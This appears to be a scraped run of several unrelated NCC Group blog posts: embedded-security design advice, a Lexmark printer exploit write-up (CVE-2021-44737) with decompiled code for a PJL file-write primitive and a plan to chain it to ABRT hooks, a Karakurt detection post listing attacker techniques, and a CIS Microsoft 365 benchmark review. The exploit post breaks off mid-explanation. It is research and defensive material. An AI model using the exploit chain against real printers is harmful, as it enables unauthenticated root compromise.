A reasonable baseline for nearly all modern products is to set the initial bar at “thousands of dollars,” which implies that an attack on the core chipset of the device is required. Anything less, and your product will very likely fall victim to a very cheap circuit attack. Setting the bar this high should not reflect the product cost or price, but rather the value of the assets that the device must protect. Mass market devices like smartphones have had this level of security since at least the early 2000s. And that’s good — every aspect of our lives is accessed by our smartphones, so the cost for an attacker should be high.

A formal threat model is a living document that can be adjusted and consulted as needed throughout the product development cycle.

Platform Selection

Next, you need to select your building blocks: the platform, processor, bootloaders and operating system.

Processor

Most embedded systems are built around a core microcontroller, system-on-chip (SoC) or other CPU. For most companies this involves outsourcing and technical debt: Building connected consumer devices, industrial control systems or vehicle ECUs typically means selecting a chipset from a third-party vendor that meets cost, performance and feature requirements. But let’s not forget security requirements: Not all components are designed with security in mind, and careful evaluation will make this clear. Make sure it has the security features you need — cryptographic accelerators, hardware random number generator, secure boot or other firmware integrity features, a modern memory management unit to implement privilege separation and memory protections, internal fuse-based security configuration, and a hardware root-of-trust. It’s also important to ensure that it doesn’t have security traps you want to avoid. For example:

  • Ask the vendor to show you the security audit of the internal ROM(s).
  • Get details about the security properties of the provisioning systems.
  • Ask how they handle devices returned for failure analysis after debug functionality has been disabled (you’ll be surprised how many admit to having a backdoor).
  • Understand specifics about how the hardware boots the software, security properties of the ROM, bootloader, and firmware reference design.

One crucial aspect of any processor is that it must form a trust anchor: a root-of-trust that can validate the integrity of the system firmware for subsequent boot stages. This typically consists of an immutable first-stage bootloader (in ROM or internal flash), and an immutable public key (commonly programmed into fuses). While all other aspects of the system firmware can be validated, the root-of-trust is trusted implicitly.

Operating System

Next you need to choose a software stack to run atop the hardware and boot system provided by your chip vendor. There are many commercial and open source embedded operating system vendors to choose from, with different levels of security maturity: Linux/Android, FreeRTOS, Zephyr, MbedOS, VxWorks, and more. Many companies will even roll their own. Your chipset vendor will influence the selection with a shortlist of operating systems they support, and anything else means more work for you. The key criteria here are privilege separation, memory protection, capabilities and access controls, secure storage, and modern exploit mitigations. Also important is a vendor commitment to providing ongoing support on the hardware platform you’re using.

Application Runtime

At the application level, where you implement the bulk of the business logic, you again have choices. Most vulnerabilities are memory corruption-related, and they can be severe, even catastrophic. Consequently, these are also among the few classes of vulnerabilities we know how to eliminate, and that’s by using modern memory safe programming languages. If your platform supports such an environment, then applications should be written in Java, Go, Rust or Python. Where this is not possible, employ strong defensive programming and secure development lifecycle (SDLC)[4] techniques to reduce the risk of developer errors ending up in the released product.

Other

Once the requirements are laid out and major platform decisions have been made, the bulk of the design, implementation and testing phases of the product development process can move forward. Through the development cycle, continual security review with reference to the threat model (with updates as needed) will keep you on the right path.

A few other security measures deserve mention:

Patching

Patching and ongoing maintenance is crucial to the continued operation of your devices. Threats evolve rapidly as vulnerabilities are discovered, and new attacker techniques are developed. Staying ahead of the bad guys requires that firmware updates be released on a regular cadence, and that there be a high adoption and installation of these patches. Automatic updates can make this extremely practical for most connected devices. Where safety considerations prevent automatic updates, or where users are otherwise involved in the update process, regular update behavior can sometimes be incentivized (e.g.: Apple has frequently included new emoji collections with their security updates to encourage user adoption).

One challenge is in the form of that technical debt you inherited when you outsourced your board support package. The chip business is sales-driven, and they have little incentive to maintain ongoing support for old devices and BSP versions. One way to help here is to ensure that ongoing security support is enshrined in the contract; otherwise, security is an afterthought.

Manufacturing and supply chain

If you are using a general-purpose microcontroller or SoC from a common vendor, you should expect the root-of-trust to be unconfigured until you provision it. This is where your manufacturing and production processes come into play — it is absolutely vital for these steps to be performed securely if your product is to rely on these bedrock security features[5]. However, there are strong incentives to outsource production to ODM or CM partners with low labor costs — the challenge is to ensure that your root-of-trust is securely configured even with potential threat actors in the factory[6].

Getting these processes in place early in the development cycle can be difficult, partly because secure firmware is likely to lag behind early hardware prototypes. Getting to them late can be equally difficult, because manufacturing is likely to resist process changes once they have a working recipe that produces widgets with the expected yield.

Repair and reverse logistics also likely require privileged access to your embedded devices. Ensuring that this privilege cannot be abused requires strong authentication on the calibration and configuration interfaces, and a careful understanding of the nuances of the production process for your specific devices.

Summary

Early threat modeling and the development of security requirements doesn’t have to be a burden, and it can save a great deal of time and effort if done at the right time. Incorporating input from your security experts will help you make the right platform choices and avoid the churn associated with repeated security fixes. Early engagement is far more effective.

References

[1] https://www.ioxtalliance.org/the-pledge

[2] https://ogi-cdn.s3.us-east-2.amazonaws.com/csis/firmware-security-best-practices-v1.1.pdf

[3] https://www.nccgroup.com/uk/our-research/security-of-things-an-implementers-guide-to-cyber-security-for-internet-of-things-devices-and-beyond/

[4] https://www.nccgroup.com/uk/our-services/cyber-security/specialist-practices/secure-development-cycle/

[5] https://www.nccgroup.trust/us/our-research/secure-device-provisioning-best-practices-heavy-truck-edition/

[6] https://research.nccgroup.com/wp-content/uploads/2020/07/secure-device-manufacturing-supply-chain-security-resilience-whitepaper.pdf


Rob Wood is the VP for the Hardware and Embedded Security Services practice at cybersecurity consultancy, NCC Group. His career in embedded devices spans two decades, having worked at both BlackBerry and Motorola Mobility in roles focused on embedded software development, product firmware and hardware security, and supply chain security. Rob is an experienced firmware developer with extensive security architecture experience. His specialty is in designing, building, and reviewing products to push the security boundaries deeper into the firmware, hardware, and supply chain. He is most comfortable working with the software layers deep in the bowels of the system, well below userland, where the lines between hardware and software begin to blur. This includes things like the bootloaders, kernel, device drivers, firmware, baseband, trusted execution environments, debug and development tools, factory and repair tools, bare-metal firmware, and all the processes that surround them.

Tags: Design MethodsSecurity

Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review

5 April 2023 at 15:40

During October 2021, O(1) Labs engaged NCC Group’s Cryptography Services team to conduct a cryptography and implementation review of selected components within the main source code repository for the Mina project. Mina implements a cryptocurrency with a lightweight and constant-sized blockchain, where the code is primarily written in OCaml. The selected components involved the client SDK, private/public key functionality, Schnorr signature logic and several other related functions. Full access to source code was provided with support over Discord, and two consultants delivered the engagement with eight person-days of effort.

The Public Report for this review may be downloaded below:

Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)

5 April 2023 at 15:40

Summary

This blog post describes a vulnerability found and exploited in October 2021 by Alex Plaskett, Cedric Halbronn, and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at Pwn2Own 2021 competition in November 2021. Lexmark published a public patch and their advisory in January 2022 together with the ZDI advisory. The vulnerability is now known as CVE-2021-44737.

We decided to target the Lexmark MC3224i printer. However, it seemed to be out of stock everywhere, so we decided to buy a Lexmark MC3224dwe printer instead. The main difference seems to be that the Lexmark MC3224i model has additional fax features whereas the Lexmark MC3224dwe model does not. From an analysis point of view, it means there may be a few differences and most probably we would not be able to target some features. We downloaded the firmware updates for both models and they were exactly the same so we decided to pursue since we didn’t have a choice anyway 🙂

As per Pwn2Own requirements the vulnerability can be exploited remotely, does not need authentication, and exists in the default configuration. It allows an attacker to get remote code execution as the root user on the printer. The Lexmark advisory indicates all the affected Lexmark models.

The following steps described the exploitation process:

  1. A temporary file write vulnerability (CVE-2021-44737) is used to write an ABRT hook file
  2. We remotely crash a process in order to trigger the ABRT abort handling
  3. The abort handling ends up executing bash commands from our ABRT hook file

The temporary file write vulnerability is in the "Lexmark-specific" hydra service (/usr/bin/hydra), running by default on the Lexmark MC3224dwe printer. hydra is a pretty big binary and handles many protocols. The vulnerability is in the Printer Job Language (PJL) commands and more specifically in an undocumented command named LDLWELCOMESCREEN.

We have analysed and exploited the vulnerability on the CXLBL.075.272/CXLBL.075.281 versions but older versions are likely vulnerable too. We detail our analysis on CXLBL.075.272 in this blog post since CXLBL.075.281 was released mid-October, and we had already been working on it.

Note: The Lexmark MC3224dwe printer is based on the ARM (32-bit) architecture, but it didn’t matter for exploitation, just for reversing.

We named our exploit "MissionAbrt" due to triggering an ABRT but then aborting the ABRT.

You said "Reverse Engineering"?

The Lexmark firmware update files that you can download from the Lexmark download page are encrypted. If you are interested to know how our colleague Catalin Visinescu managed to get access to the firmware files using hardware attacks, please refer to our first installment of our blog series.

Vulnerability details

Background

As Wikipedia says:

Printer Job Language (PJL) is a method developed by Hewlett-Packard for switching printer languages at the job level, and for status readback between the printer and the host computer. PJL adds job level controls, such as printer language switching, job separation, environment, status readback, device attendance and file system commands.

PJL commands look like the following:

@PJL SET PAPER=A4
@PJL SET COPIES=10
@PJL ENTER LANGUAGE=POSTSCRIPT

PJL is known to be useful for attackers. In the past, some printers had vulnerabilities allowing to read or write files on the device.

PRET is a tool allowing to talk PJL (among other languages) for several printer’s brands, but it does not necessarily support all of their commands due to each vendor supporting its own proprietary commands.

Reaching the vulnerable function

The hydra binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary. Lots of PJL commands are registered by setup_pjl_commands() at address 0xFE17C. We are interested in the LDLWELCOMESCREEN PJL command, which seems proprietary to Lexmark and undocumented.

int __fastcall setup_pjl_commands(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = create_pjl_ctx(a1);
pjl_set_datastall_timeout(pjl_ctx, 5);
sub_11981C();
pjlpGrowCommandHandler("UEL", pjl_handle_uel);
...
pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);
...

When a PJL LDLWELCOMESCREEN command is received, the pjl_handle_ldlwelcomescreen() at 0x1012F0 starts handling it. We see this command takes a string representing a filename as a first argument:

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
result = pjl_check_args(client_cmd, "FILE", "PJL_STRING_TYPE", "PJL_REQ_PARAMETER", 0);
if ( result <= 0 )
return result;
filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
return pjl_handle_ldlwelcomescreen_internal(filename);
}

Then, the pjl_handle_ldlwelcomescreen_internal() function at 0x10A200 opens that file. Note that if the file exists, it won’t open that file and returns immediately. Consequently, we can only write files that do not exist yet. Furthermore, the complete directory hierarchy has to already exist in order for us to create the file and we also need to have permissions to write the file.

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char *filename)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
if ( !filename )
return 0xFFFFFFFF;
fd = open(filename, 0xC1, 0777); // open(filename,O_WRONLY|O_CREAT|O_EXCL, 0777)
if ( fd == 0xFFFFFFFF )
return 0xFFFFFFFF;
ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd);// goes here
if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
pjl_process_ustatus_device_(20001);
close(fd);
remove(filename);
return ret;
}

We will analyse pjl_ldwelcomescreen_internal2() below but please note above that the file is closed at the end and then the filename is entirely deleted with the remove() call. This means it seems we can only temporarily write that file.

Understanding the file write

Now let’s analyse the pjl_ldwelcomescreen_internal2() function at 0x115470. It will end up calling pjl_ldwelcomescreen_internal3() due to flag == 0 being passed by pjl_handle_ldlwelcomescreen_internal().

unsigned int __fastcall pjl_ldwelcomescreen_internal2(
int flag,
int one,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
bad_arg = write_to_file == 0;
if ( write_to_file )
bad_arg = pjl_getc == 0;
if ( bad_arg )
return 0xFFFFFFFF;
if ( flag )
return pjl_ldwelcomescreen_internal3bis(flag, one, pjl_getc, write_to_file, p_fd);
return pjl_ldwelcomescreen_internal3(one, pjl_getc, write_to_file, p_fd);// goes here due to flag == 0
}

We spent some time reversing the pjl_ldwelcomescreen_internal3() function at 0x114838 to understand its internals. This function is quite big and hardly readable decompiled source code is shown below, but the logic is still easy to understand.

Basically this function is responsible for reading additional data from the client and for writing it to the previously opened file.

The client data seems to be received asynchronously by another thread and saved into some other allocations into a pjl_ctx structure. Hence, the pjl_ldwelcomescreen_internal3() function reads one character at a time from that pjl_ctx structure and fills a 0x400-byte stack buffer.

  1. If 0x400 bytes have been received and the stack buffer is full, it ends up writing these 0x400 bytes into the previously opened file. Then, it resets that stack buffer and starts reading more data to repeat that process.
  2. If the PJL command’s footer ("@PJL END DATA") is received, it discards that footer part, then it writes the accumulated received data (of size < 0x400 bytes) to the file, and exits.
unsigned int __fastcall pjl_ldwelcomescreen_internal3(
int was_last_write_success,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
unsigned int current_char_2; // r5
size_t len_to_write; // r4
int len_end_data; // r11
int has_encountered_at_sign; // r6
unsigned int current_char_3; // r0
int ret; // r0
int current_char_1; // r3
ssize_t len_written; // r0
unsigned int ret_2; // r3
ssize_t len_written_1; // r0
unsigned int ret_3; // r3
ssize_t len_written_2; // r0
unsigned int ret_4; // r3
int was_last_write_success_1; // r3
size_t len_to_write_final; // r4
ssize_t len_written_final; // r0
unsigned int ret_5; // r3
unsigned int ret_1; // [sp+0h] [bp-20h]
unsigned __int8 current_char; // [sp+1Fh] [bp-1h] BYREF
_BYTE data_to_write[1028]; // [sp+20h] [bp+0h] BYREF
current_char_2 = 0xFFFFFFFF;
ret_1 = 0;
b_restart_from_scratch:
len_to_write = 0;
memset(data_to_write, 0, 0x401u);
len_end_data = 0;
has_encountered_at_sign = 0;
current_char_3 = current_char_2;
while ( 1 )
{
current_char = 0;
if ( current_char_3 == 0xFFFFFFFF )
{
// get one character from pjl_ctx->pData
ret = pjl_getc(&current_char);
current_char_1 = current_char;
}
else
{
// a previous character was already retrieved, let's use that for now
current_char_1 = (unsigned __int8)current_char_3;
ret = 1; // success
current_char = current_char_1;
}
if ( has_encountered_at_sign )
break; // exit the loop forever
// is it an '@' sign for a PJL-specific command?
if ( current_char_1 != '@' )
goto b_read_pjl_data;
len_end_data = 1;
has_encountered_at_sign = 1;
b_handle_pjl_at_sign:
// from here, current_char == '@'
if ( len_to_write + 13 > 0x400 ) // ?
{
if ( was_last_write_success )
{
len_written = write_to_file(p_fd, data_to_write, len_to_write);
was_last_write_success = len_to_write == len_written;
current_char_2 = '@';
ret_2 = ret_1;
if ( len_to_write != len_written )
ret_2 = 0xFFFFFFFF;
ret_1 = ret_2;
}
else
{
current_char_2 = '@';
}
goto b_restart_from_scratch;
}
b_read_pjl_data:
if ( ret == 0xFFFFFFFF ) // error
{
if ( !was_last_write_success )
return ret_1;
len_written_1 = write_to_file(p_fd, data_to_write, len_to_write);
ret_3 = ret_1;
if ( len_to_write != len_written_1 )
return 0xFFFFFFFF; // error
return ret_3;
}
if ( len_to_write > 0x400 )
__und(0);
// append data to stack buffer
data_to_write[len_to_write++] = current_char_1;
current_char_3 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
// reached 0x400 bytes to write, let's write them
if ( len_to_write == 0x400 )
{
current_char_2 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
if ( was_last_write_success )
{
len_written_2 = write_to_file(p_fd, data_to_write, 0x400);
ret_4 = ret_1;
if ( len_written_2 != 0x400 )
ret_4 = 0xFFFFFFFF;
ret_1 = ret_4;
was_last_write_success_1 = was_last_write_success;
if ( len_written_2 != 0x400 )
was_last_write_success_1 = 0;
was_last_write_success = was_last_write_success_1;
}
goto b_restart_from_scratch;
}
} // end of while ( 1 )
// we reach here if we encountered an '@' sign
// let's check it is a valid "@PJL END DATA" footer
if ( (unsigned __int8)aPjlEndData[len_end_data] != current_char_1 )
{
len_end_data = 1;
has_encountered_at_sign = 0; // reset so we read it again?
goto b_read_data_or_at;
}
if ( len_end_data != 12 ) // len("PJL END DATA") = 12
{
++len_end_data;
b_read_data_or_at:
// will go back to the while(1) loop but exit at the next
// iteration due to "break" and has_encountered_at_sign == 1
if ( current_char_1 != '@' )
goto b_read_pjl_data;
goto b_handle_pjl_at_sign;
}
// we reach here if all "PJL END DATA" was parsed
current_char = 0;
pjl_getc(&current_char); // read '\r'
if ( current_char == '\r' )
pjl_getc(&current_char); // read '\n'
// write all the remaining data (len < 0x400), except the "PJL END DATA" footer
len_to_write_final = len_to_write - 0xC;
if ( !was_last_write_success )
return ret_1;
len_written_final = write_to_file(p_fd, data_to_write, len_to_write_final);
ret_5 = ret_1;
if ( len_to_write_final != len_written_final )
return 0xFFFFFFFF;
return ret_5;
}

The pjl_getc() function at 0xFEA18 allows to retrieve one character from the pjl_ctx structure:

int __fastcall pjl_getc(_BYTE *ppOut)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = get_pjl_ctx();
*ppOut = 0;
InputDataBufferSize = pjlContextGetInputDataBufferSize(pjl_ctx);
if ( InputDataBufferSize == pjl_get_end_of_file(pjl_ctx) )
{
pjl_set_eoj(pjl_ctx, 0);
pjl_set_InputDataBufferSize(pjl_ctx, 0);
pjl_get_data((int)pjl_ctx);
if ( pjl_get_state(pjl_ctx) == 1 )
return 0xFFFFFFFF; // error
if ( !pjlContextGetInputDataBufferSize(pjl_ctx) )
_assert_fail(
"pjlContextGetInputDataBufferSize(pjlContext) != 0",
"/usr/src/debug/jobsystem/git-r0/git/jobcontrol/pjl/pjl.c",
0x1BBu,
"pjl_getc");
}
current_char = pjl_getc_internal(pjl_ctx);
ret = 1;
*ppOut = current_char;
return ret;
}

The write_to_file() function at 0x6595C simply writes data to the specified file descriptor:

int __fastcall write_to_file(void *data_to_write, size_t len_to_write, int fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
total_written = 0;
do
{
while ( 1 )
{
len_written = write(fd, data_to_write, len_to_write);
len_written_1 = len_written;
if ( len_written < 0 )
break;
if ( !len_written )
goto b_error;
data_to_write = (char *)data_to_write + len_written;
total_written += len_written;
len_to_write -= len_written;
if ( !len_to_write )
return total_written;
}
}
while ( *_errno_location() == EINTR );
b_error:
printf("%s:%d [%s] rc = %d\n", "../git/hydra/flash/flashfile.c", 0x153, "write_to_file", len_written_1);
return 0xFFFFFFFF;
}

From an exploitation perspective, what is interesting is that if we send more than 0x400 bytes, they will be written to that file, and if we refrain from sending the PJL command’s footer, it will wait for us to send more data, before it actually deletes the file entirely.

Note: When sending data, we generally want to send padding data to make sure it reaches a multiple of 0x400 so our controlled data is actually written to the file.

Confirming the temporary file write

There are several CGI scripts showing the content of files on the filesystem. For instance /usr/share/web/cgi-bin/eventlogdebug_se‘s content is:

#!/bin/ash
echo "Expires: Sun, 27 Feb 1972 08:00:00 GMT"
echo "Pragma: no-cache"
echo "Cache-Control: no-cache"
echo "Content-Type: text/html"
echo
echo "<HTML><HEAD><META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html; charset=UTF-8\"></HEAD><BODY><PRE>"
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Retrieved Reports ++++++++++++++++++++++]"
for i in 9 8 7 6 5 4 3 2 1 0; do
if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
cat /var/fs/shared/eventlog/logs/debug.log.$i
fi
done
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo ""
echo ""
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Configurations ++++++++++++++++++++++]"
rob call applications.eventlog getAELConfiguration n
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo "</PRE></BODY></HTML>"

Consequently, we write /var/fs/shared/eventlog/logs/debug.log.1 file with lots of A using the previously discussed temporary file write primitive.

We confirm the file is successfully written by accessing the CGI page:

From testing, we noticed that the file would be automatically deleted between 1min and 1min40, probably due to a timeout in the PJL handling in hydra. This means we are fine to use that temporary file primitive for 60 seconds.

Exploitation

Exploiting the crash event handler aka ABRT

We spent quite some time trying to find a way to execute code. We caught a break when we noticed several configuration files that define what to do when a crash occurs:

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf      emergencyanalysis_event.conf  rhtsupport_event.conf  vimrc_event.conf
ccpp_event.conf           gconf_event.conf              smart_event.conf       vmcore_event.conf
centos_report_event.conf  koops_event.conf              svcerrd.conf
coredump_handler.conf     print_event.conf              uploader_event.conf

For instance, coredump_handler.conf allows to execute shell commands:

# coredump-handler passes /dev/null to abrt-hook-ccpp which causes it to write
# an empty core file. Delete this file so we don't attempt to use it.
EVENT=post-create type=CCpp
    [ "$(stat -c %s coredump)" != "0" ] || rm coredump

The following page describes well how ABRT works:

Detecting Karakurt – an extortion focused threat actor

This research was conducted by Simon Biggs, Richard Footman and Michael Mullen author’ from NCC Group Cyber Incident Response Team. You can find more here Incident Response – NCC Group

tl;dr

NCC Group’s Cyber Incident Response Team (CIRT) have responded to several extortion cases recently involving the threat actor Karakurt. 

During these investigations NCC Group CIRT have identified some key indicators that the threat actor has breached an environment and we are sharing this intelligence to assist the cyber defense security community.  

It is thought that there may be a small window to respond to an undetected Karakurt breach prior to data exfiltration taking place and we strongly urge any organisations that use single factor Fortinet VPN access to use the information from the detection section of this blog to identify if they may have been breached. 

Initial Access  

In all cases investigated, Karakurt have targeted single factor Fortigate Virtual Private Network (VPN) servers.  

It was observed that access was made using legitimate Active Directory credentials for the victim environment. 

The typical Dwell time (Time from threat actor access to detection) has been in the region of just over a month, in part due to the fact the group do not encrypt their victims and use “living off the land” techniques to remain undetected by not utilising anything recognised as malware.   

It is not clear how these credentials have been obtained at this stage with the VPN servers in question not being vulnerable to the high profile Fortigate vulnerabilities that have had attention over the past couple of years. 

NCC Group strongly recommends that any organisation utilising single factor authentication on a Fortigate VPN to search for the indicators of compromise detailed at the conclusion of this blog.  

Privilege Escalation  

Karakurt have obtained access to domain administrator level privileges in all of the investigated cases, but the privilege escalation method has not yet been accurately determined.  

In one case, attempts to exploit CVE-2020-1472, also known as Zerologon, were detected by security software. The actual environment was not vulnerable to Zerologon however indicating Karakurt may be attempting to exploit a number of vulnerabilities as part of their operation.  

Lateral Movement  

Karakurt have then been seen to move laterally onto the primary domain controller of their victim’s using the Sysinternals tool PsExec which provides a multitude of remote functionality. 

Karakurt have also utilised Remote Desktop Protocol (RDP) to move around victim environments.      

Discovery  

Once Karakurt obtain access to the primary domain controller they conduct a number of discovery actions, enumerating information about the domain controller itself as well as the wider domain.  

One particular technique involves creating a DNS Zone export via an Encoded PowerShell command.  

This command leaves a series of indicators in the Microsoft-Windows-DNS-Server-Service Event Log in the form of Event ID 3150, DNS_EVENT_ZONE_WRITE_COMPLETED.  

This log is interesting as an indicator as it was present in all Karakurt engagements investigated by NCC Group CIRT and in all cases the only occurrence of these events were caused when Karakurt performed the zone exports. This was conducted very early in the breach just after initial access and prior to data exfiltration occurring, which was typically two weeks from initial access.  

This action is also accompanied by extraction of the NTDS.dit file, believed to be utilised by Karakurt to obtain further credentials as a means of persistence in the environment should the account they initially gained access with be disabled.  

This is evident through the presence of logs showing the volume shadow service being utilised.  

NCC Group CIRT strongly recommends that any organisation using single factor Fortinet VPN access checks their domain controllers Microsoft-Windows-DNS-Server logs for evidence of Event ID 3150. If this is present at any point since December then it may well be an indicator of a breach by Karakurt. 

Data Staging  

Once the discovery actions have been completed Karakurt appeared to leave the environment before re-entering and identifying servers with access to sensitive victim data on file shares. Once such a server is identified a secondary persistence mechanism was utilised in the form of the remote desktop software AnyDesk allowing Karakurt access even if the VPN access was removed.  

On the same server that AnyDesk is installed Karakurt have been identified browsing folders local to the server and on file shares.   

7-Zip archives have then been created on the server.  

In the cases investigated there were no firewall logs or other evidence to confirm the data was then exfiltrated but based on the claims from Karakurt along with the file tree text file provided as proof, it is strongly believed that the data was exfiltrated in all cases investigated. 

It is suspected that Karakurt are utilising Rclone to exfiltrate data to cloud data hosting providers. This technique was discussed in a previous NCC Group blog, Detecting Rclone – An Effective Tool for Exfiltration 

Mitigations  

  • To remove the threat immediately multi-factor authentication should be implemented for VPN access using a Fortinet VPN.  
  • Ensure all Domain Controllers are fully patched and patch for critical vulnerabilities generally. 

Detection  

  • Look for evidence of the hosts authenticating from the VPN pool with the naming convention used as default for Windows hosts, for example DESKTOP-XXXXXX. 
  • Check for event log 3150 in the Microsoft-Windows-DNS-Server-Service Event Log. 
  • Check for unauthorised use of AnyDesk or PsExec in the environment. 

NCC Group Incident Response services provide specialists to help guide and support you through incident handling, triage and analysis, all the way through to providing remediation guidance

Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5 Attacks vs the CIS Microsoft 365 Foundation Benchmark

5 April 2023 at 15:40

As one of the proud contributors to the Center for Internet Security (CIS) Microsoft 365 Foundation Benchmark, I wanted to raise awareness about the new version release by the Center for Internet Security (CIS) released on February 17th, and how it can help a company to have a secure baseline for their Microsoft 365 tenant.

The first CIS Microsoft 365 Foundation Benchmark was released back in December 2018. Version v1.4.0 has now been released and quoting from the guide, [1]Provides prescriptive guidance for establishing a secure configuration posture for Microsoft 365 Cloud offerings running on any OS. This guide was tested against Microsoft 365, and includes recommendations for Exchange Online, SharePoint Online, OneDrive for Business, Skype/Teams, Azure Active Directory, and Intune.

About the Benchmark

This is a community-driven benchmark that collects input from contributors across different industry sectors and is based on a mutual consensus regarding the issues. This means discussing new and old recommendations at a biweekly meeting or in the online forum via tickets and discussions, proof reading and many more.

There are seven sections, namely:

  1. Account/Authentication
  2. Application Permissions
  3. Data Management
  4. Email Security/Exchange Online
  5. Auditing
  6. Storage
  7. Mobile Device Management.

The sections are defined by four profiles that are based on licensing, security level and effect.

The document follows a nice structure similar to a penetration test report: title, applicability, description, rationale, impact, audit, remediation, default value and CIS control mapping.

Wherever it is possible for a recommendation to be checked in an automated way, the audit and remediation section will include instructions.

At the end of the document, there is a checklist summary table for helping to track each recommendation outcome.

Top 5 Attacks on Microsoft 365 vs CIS Microsoft 365 Foundation Benchmark

Below I’ve shared 5 of the most common ways I’ve seen Microsoft 365 tenants compromised in real-world environments, as well as the corresponding CIS benchmarks that can help prevent these specific weaknesses. The attacks considered below are spamming, phishing, password attacks, malicious apps and data exfiltration.

Let’s see now if the foundation benchmark is effective in preventing these Top 5 attacks.

1. Spamming

Spamming is the use of messaging systems to send multiple unsolicited messages (spam) to large numbers of recipients for the purpose of commercial advertising, for the purpose of non-commercial proselytizing, for any prohibited purpose (especially the fraudulent purpose of phishing), or simply sending the same message over and over to the same user.” [4]

“Microsoft processes more than 400 billion emails each month and blocks 10 million spam and malicious email messages every minute to help protect our customers from malicious emails.” [3]

The CIS Benchmark has the following recommendations against spam:

  • 2.4 Ensure Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is Enabled
  • 4.2 Ensure Exchange Online Spam Policies are set correctly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled
  • 5.14 Ensure the report of users who have had their email privileges restricted due to spamming is reviewed

2. Phishing

Phishing is when attackers attempt to trick users into doing ‘the wrong thing’, such as clicking a bad link that will download malware, or direct them to a dodgy website.” [5]

“Microsoft Defender for Office 365 blocked more than 35.7 billion phishing and other malicious e-mails targeting enterprise and consumer customers, between January and December 2021.” [2]

The CIS Benchmark has the following recommendations against phishing:

  • 2.3 Ensure Defender for Office Safe Links for Office Applications is Enabled
  • 2.10 Ensure internal phishing protection for Forms is enabled
  • 4.7 Ensure that an anti-phishing policy has been created
  • 4.5 Ensure the Safe Links policy is enabled
  • 5.12 Ensure the spoofed domains report is review weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

3. Password Brute-Force and Password Spraying

These two types of password attacks differ in volume and order. Brute-forcing a given user’s password will generate a lot of “noise” as an attacker could try millions of passwords for one user from a wordlist before moving to a different user. Password spraying is a type of brute-force attack which tries a common password for all users and then not more than couple more, with delays between every new password try to avoid user lockouts.

“Microsoft (Azure Active Directory) detected and blocked more than 25.6 billion attempts to hijack enterprise customer accounts by brute-forcing stolen passwords, between January and December 2021.” [2]

“Microsoft says MFA adoption remains low, only 22% among Azure AD enterprise customers” [6]

The CIS Benchmark has the following recommendations against brute-force and password spraying:

  • 1.1.1 Ensure multifactor authentication is enabled for all users in administrative roles
  • 1.1.2 Ensure multifactor authentication is enabled for all users in all roles
  • 1.1.5 Ensure that password protection is enabled for Active Directory
  • 1.1.6 Enable Conditional Access policies to block legacy authentication
  • 1.1.8 Enable Azure AD Identity Protection sign-in risk policies
  • 1.1.9 Enable Azure AD Identity Protection user risk policies
  • 1.1.7 Ensure that password hash sync is enabled for resiliency and leaked credential detection
  • 1.1.10 Use Just In Time privileged access to Office 365 roles
  • 5.3 Ensure the Azure AD ‘Risky sign-ins’ report is reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

4. Malicious Apps

“The Azure Active Directory (Azure AD) application gallery is a collection of software as a service (SaaS) applications that have been pre-integrated with Azure AD.” [5] These SaaS web applications can help automate tasks and extend the functionality of Microsoft 365 services, but there are also add-ons for on-premises Office 365 applications.

The CIS Benchmark has the following recommendations against malicious apps and add-ons:

  • 2.1 Ensure third party integrated applications are not allowed
  • 2.6 Ensure user consent to apps accessing company data on their behalf is not allowed
  • 2.7 Ensure the admin consent workflow is enabled
  • 2.8 Ensure users installing Outlook add-ins is not allowed
  • 2.9 Ensure users installing Word, Excel, and PowerPoint add-ins is not allowed
  • 5.4 Ensure the Application Usage report is reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

5. Data Exfiltration via Automatic Email Forwarding

Attackers often use built-in functionality to move data out from user mailboxes, and one of the most popular methods is automatic email forwarding rules.

The CIS Benchmark has the following recommendations against automatic email forwarding:

  • 4.3 Ensure all forms of mail forwarding are blocked and/or disabled
